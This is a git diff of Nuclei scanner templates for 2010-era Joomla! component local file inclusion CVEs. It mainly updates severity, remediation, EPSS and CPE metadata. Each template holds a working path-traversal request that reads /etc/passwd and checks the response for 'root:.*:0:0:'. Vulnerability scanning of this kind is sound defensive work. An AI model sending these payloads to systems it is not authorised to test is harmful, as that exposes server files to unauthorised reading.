cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: corejoomla + product: com_communitypolls + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a0047304502201109720fce23f8c11f67b2af17f59c70ca5f49529b91879e96e61d34f9950c9d022100b245643db82094faaf69edcc0bddde30e3f8857db8d1a50a7d2a08107d22f93f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 1d3b81fcc9..c85566229f 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1217 info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 - remediation: Apply all relevant security patches and product upgrades. + - http://www.exploit-db.com/exploits/11814 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1217 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin + epss-score: 0.01155 + epss-percentile: 0.83278 + cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: je_form_creator + product: je_form_creator + tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + +# digest: 4a0a0047304502200cc252f65e51a36f610deb94498d3c7bccefb686f9d63d5ca0cc77f3ea735b26022100b5500ce85603b99ba0a867fe70a2e481b3dfe67dabc68ef9510705d2a90cb867:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index f1eeb0ca5e..8afc9352f6 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1219 info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11757 - https://nvd.nist.gov/vuln/detail/CVE-2010-1219 - - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952 - - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1219 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00813 + epss-percentile: 0.79883 + cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com_janews + product: com_janews + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100ffe5a3472c42c1808ab2bd5770ea5c20e0cb762a00e7e1de25410af4ed072df902201cc7490ca8126c51336795f3b2f0d60adedd66fd8bd9e4504e676cee8fe359ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index e65e3dd648..d5e9c78cd2 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -3,33 +3,39 @@ id: CVE-2010-1302 info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11978 - https://nvd.nist.gov/vuln/detail/CVE-2010-1302 - - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/ - - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1302 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi,graph + epss-score: 0.01204 + epss-percentile: 0.8368 + cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: decryptweb + product: com_dwgraphs + tags: edb,cve,cve2010,joomla,lfi,graph http: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100f831d1ea90360e9566951b1a42ab34baef4bb0606d9ba2425e26c0c7ecec84ca022100b4299171ddd5b51c7f940affb21005fcf8a7c9de1493a0d7bfc844744651460d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index a510d48b34..a74a9228ce 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1304 info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11998 - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - http://www.exploit-db.com/exploits/11998 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1304 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,status,edb,cve + epss-score: 0.0045 + epss-percentile: 0.72278 + cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_userstatus + tags: cve2010,joomla,lfi,status,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100e05d000cd8e834f80113fabc3ee384fa194dcbbbecb38db03e4b59241fe5bdae022100d5063ab436e2de361163f562e5b4ac64c28a80ffc11f9917e8cbe62a2383716f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 4b1299fdb7..b55ec49e43 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1305 info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12065 - https://nvd.nist.gov/vuln/detail/CVE-2010-1305 - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/ - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/0811 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1305 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.03203 + epss-percentile: 0.901 + cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_jinventory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100971d3f14a84bbe7394416675c1c1c00fe81ec7bb290ff12bc9d5e68c3e93ff990220121aedfea56f32deae79988e58bb573c9ce104329ac5fabba5ea6d885b2ef48f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 244dec6296..0d56797e9a 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -5,31 +5,38 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12058 - https://nvd.nist.gov/vuln/detail/CVE-2010-1306 - - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/ - - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/ - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1306 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlapicasa2 + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 490a004630440220361b8f46edc3d59e8571c457996c0e46a5e5c56857d7f971fdd3abc2c03263de02200c4650a4cf4833be009212b7fbb5fe2e26ac15fd233132ff343447e60d8bd36b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index a1847b7be6..990741f2a9 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1307 info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12070 - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/ - http://www.vupen.com/english/advisories/2010/0806 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01751 + epss-percentile: 0.86565 + cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: software.realtyna + product: com_joomlaupdater + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100e5ebaeed2bac266bb34d7bfc54db49c3b57bb448a4492b8d14e332f923b351d6022100d0865fbba6ab8fe30a6386ca7c79690f1c739d502bfefc6cf08bfbe843719df3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index edac850f8d..768036166d 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -3,32 +3,40 @@ id: CVE-2010-1308 info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12066 - https://nvd.nist.gov/vuln/detail/CVE-2010-1308 - http://www.vupen.com/english/advisories/2010/0809 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1308 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01334 + epss-percentile: 0.84573 + cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: la-souris-verte + product: com_svmap + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a004730450221008c2d9d6c1d0fa510f1c371ca7397f0522d890bf7ed44bfb73c5a254c17b35031022058d2d7bc3d1c631fee37b39d62937b3050f6ebb6f884ad001a891513ae83badc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 156148818e..3ce1817a76 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1312 info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12077 - https://nvd.nist.gov/vuln/detail/CVE-2010-1312 - - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1312 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01155 + epss-percentile: 0.83278 + cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ijoomla + product: com_news_portal + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 490a0046304402207c9eeb4dd64b971fab9d3941f10d8b0352f0a8f947dbd151fb8662e69f02cd460220195d1871732a802799f5f513de99d4439bf6b805091a8d05e9d0fd011bb02731:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index fe00eb5cc6..163ada1627 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1313 info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/ - http://www.exploit-db.com/exploits/12082 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N + cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 - cvss-score: 4.3 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + epss-percentile: 0.72278 + cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seber + product: com_sebercart + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100e119dc09015398c25889598cfdfde8d92bc042ad33dcbae6145f81d6b1889c41022100eee3202502ae5f3e171a65ae426e4a50e24ec663997da4bd8a04d8a02e725828:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index ca7dd58a15..aa18c1534a 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1314 info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12086 - https://nvd.nist.gov/vuln/detail/CVE-2010-1314 - - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/ - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1314 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlanook + product: com_hsconfig + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100a9c62f4f123e4a76216b002088e7fee532676b3f5500b2dbae96f4b489cc0024022030e1aad84c65aa89798c42d8fdb260530582c49bf57ed5ccad01dc09d534340d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 8a3774fbf8..24099c0e8e 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1315 info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11999 - https://nvd.nist.gov/vuln/detail/CVE-2010-1315 - - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1315 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.0087 + epss-percentile: 0.80545 + cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_weberpcustomer + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a0047304502206eca475da1f365912bccfbf6ad65fe6016e4a4f6b108b4a05af2f5b0c3f488fc0221008e7e5df014034a477aafbca3a1bff697fcd016561d90231930c972cd183c1c83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 2f24725953..faa74709ec 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1340 info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/33797 - https://nvd.nist.gov/vuln/detail/CVE-2010-1340 - - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/ - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1340 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + epss-percentile: 0.83278 + cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla-research + product: com_jresearch + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a004730450221008e0ee62f356399e9271e1a02299fff568f24f1e4be6cf22773f5d10cfef301cb022050534753e23af6627498da820d9d80ec97228da13e84307e2a1a36d88312ecdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 4dba7a7b07..848083ba2a 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -3,32 +3,40 @@ id: CVE-2010-1345 info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 - https://nvd.nist.gov/vuln/detail/CVE-2010-1345 - http://www.exploit-db.com/exploits/11785 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1345 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cookex + product: com_ckforms + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022045fb60d254195a8539ca3898ea3c42f4ae26f7ec20b7bc1f1e2ddee773b33e62022100860b5a3cf088318a9b4106f3db310adaafa529886aa91e011c2fa18da2179b0c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index d490805b8b..d7bcca91bb 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1352 info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12084 - https://nvd.nist.gov/vuln/detail/CVE-2010-1352 - - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1352 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jooforge + product: com_jukebox + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100db2781144213601f53bc66f280cecdb0dcc60561254655b31b4fdb46060149bf022100a1a1a3b0233c39e198ac8d5362ba55173586e83da6e287ed4415d3d292cd584e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index e8098ba157..ac8f7d18dc 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1353 info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component. reference: - https://www.exploit-db.com/exploits/12068 - https://nvd.nist.gov/vuln/detail/CVE-2010-1353 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ - http://www.vupen.com/english/advisories/2010/0808 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57533 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1353 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + epss-percentile: 0.86565 